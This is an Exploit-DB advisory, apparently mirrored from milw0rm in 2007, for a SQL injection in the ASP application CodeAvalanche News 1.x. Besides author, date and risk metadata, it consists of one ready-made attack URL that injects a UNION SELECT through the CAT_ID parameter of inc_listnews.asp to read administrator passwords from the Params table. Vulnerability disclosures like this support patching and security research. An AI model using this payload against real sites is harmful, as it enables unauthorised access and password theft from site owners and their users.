CodeAvalanche News 1.x - 'CAT_ID' SQL Injection

EDB-ID:

3317

Author:

beks

Type:

webapps

Platform:

ASP

Published:

2007-02-15

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# milw0rm.com [2007-02-15]